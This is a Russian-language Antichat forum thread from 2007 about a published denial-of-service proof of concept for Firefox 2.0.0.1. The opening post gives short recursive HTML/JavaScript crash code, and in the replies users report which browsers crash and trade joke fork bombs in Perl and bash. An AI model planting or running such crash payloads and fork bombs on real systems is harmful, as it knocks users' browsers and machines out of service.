Форум АНТИЧАТ - Mozilla Firefox 2.0.0.1 DoS exploit

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Мировые новости (https://forum.antichat.xyz/forumdisplay.php?f=23)

- - Mozilla Firefox 2.0.0.1 DoS exploit (https://forum.antichat.xyz/showthread.php?t=30445)

ATFakep

02.01.2007 22:01

Mozilla Firefox 2.0.0.1 DoS exploit

PoC exploit:

Код HTML:

<script>

function owned(){



setTimeout("owned()",1000);

owned();

}

</script>

<input type="foo" size="30" id="bar" onchange="owned()">

Протестироваться можно здесь: http://sapheal.cybersecurity.pl/blac...rko_ABCDE.html

Багу нашел Michal Bucko.

ice1k

02.01.2007 22:21

Цитата:

Сообщение от Arvi The Fakep

PoC exploit:

Код HTML:

<script>

function owned(){



setTimeout("owned()",1000);

owned();

}

</script>

<input type="foo" size="30" id="bar" onchange="owned()">

Протестироваться можно здесь: http://sapheal.cybersecurity.pl/blac...rko_ABCDE.html

Багу нашел Michal Bucko.

мде =\ 4ё-то кодеры это не учли =\
Наверно в следующем апдейте исправят

KPOT_f!nd

02.01.2007 22:54

Цитата:

Наверно в следующем апдейте исправят

Не наверное, а точнО! Все что сделано руками, человека. Всегда будут баги.

Ksander

02.01.2007 22:57

myIE тоже бьет =)

Abra	02.01.2007 23:46

Arvi The Fakep
взял и обидел лисичку

guest3297

03.01.2007 00:38

мля ждем патча... пока слезу на оперу...

TANZWUT

03.01.2007 01:29

хмм... у меня Portable Firefox - не пашет чтота =)

Abra	03.01.2007 01:40

Цитата:

хмм... у меня Portable Firefox - не пашет чтота =)

Если мне память не изменяет то он с 1.5 делался, а не с двойки и вроде бы не обновлялся.(могу ошибаться)

Gh0s7

03.01.2007 01:41

Мда.

/me нашел мега-пупер-супер багу в перле

Код:

while (1) { fork; }

maniac.pl

05.01.2007 11:52

opera
Версия 9.0
Сборка 8031
упала :(((

Огненый лисиц
1,5 бета 2, выстоял, не посрамив рудой хвост :)

осел намбер 6 упал сразу....

NFM	05.01.2007 12:17

Opera
9.00 Beta
Build
8359
зашел на страницу, ждал ждал ничего не происходило посомтрел процес опера жрала 90 процентов =), но все равно все нормально грузилось правда с торможением =)

_Great_

05.01.2007 12:26

Тоже мне багу нашли.
Я тоже такую в линуксе нашел, ага:

script:
#!/bin/bash
./script

$ chmod +x script
$ ./script

nerezus

05.01.2007 13:38

Цитата:

Тоже мне багу нашли.
Я тоже такую в линуксе нашел, ага:

script:
#!/bin/bash
./script

$ chmod +x script
$ ./script

При нормальных настройках системы не поможет: процесс сразу в минмальный приоритет уйдет.

_Great_

05.01.2007 13:45

ну на новых системах это не поможет.

а на старых поможет и еще как, это же саморазмножающийся скрипт :)

Sov1et

05.01.2007 14:25

Цитата:

Сообщение от [ cash ]

мля ждем патча... пока слезу на оперу...

Так ето ж всего навсего отказ в обслуживании и всё... Тут ИМХо не очень страшно -ето ж не дыры в осле,с помощью которых можно подцепить что угодно =))

fucker"ok

05.01.2007 14:56

что за бред. Ещё эксплойтом назвали.

nerezus

05.01.2007 17:02

Цитата:

ну на новых системах это не поможет.

а на старых поможет и еще как, это же саморазмножающийся скрипт

Что значит на новых и на старых?
тут только от того, как система настроена, зависит.
в том же древнем Alt Linux 2.4 у тебя такое не выйдет, т.к. система из коробки не имеет секурити-дефектов(кроме как старый софт, но ранье то он был новый)

Время: 11:01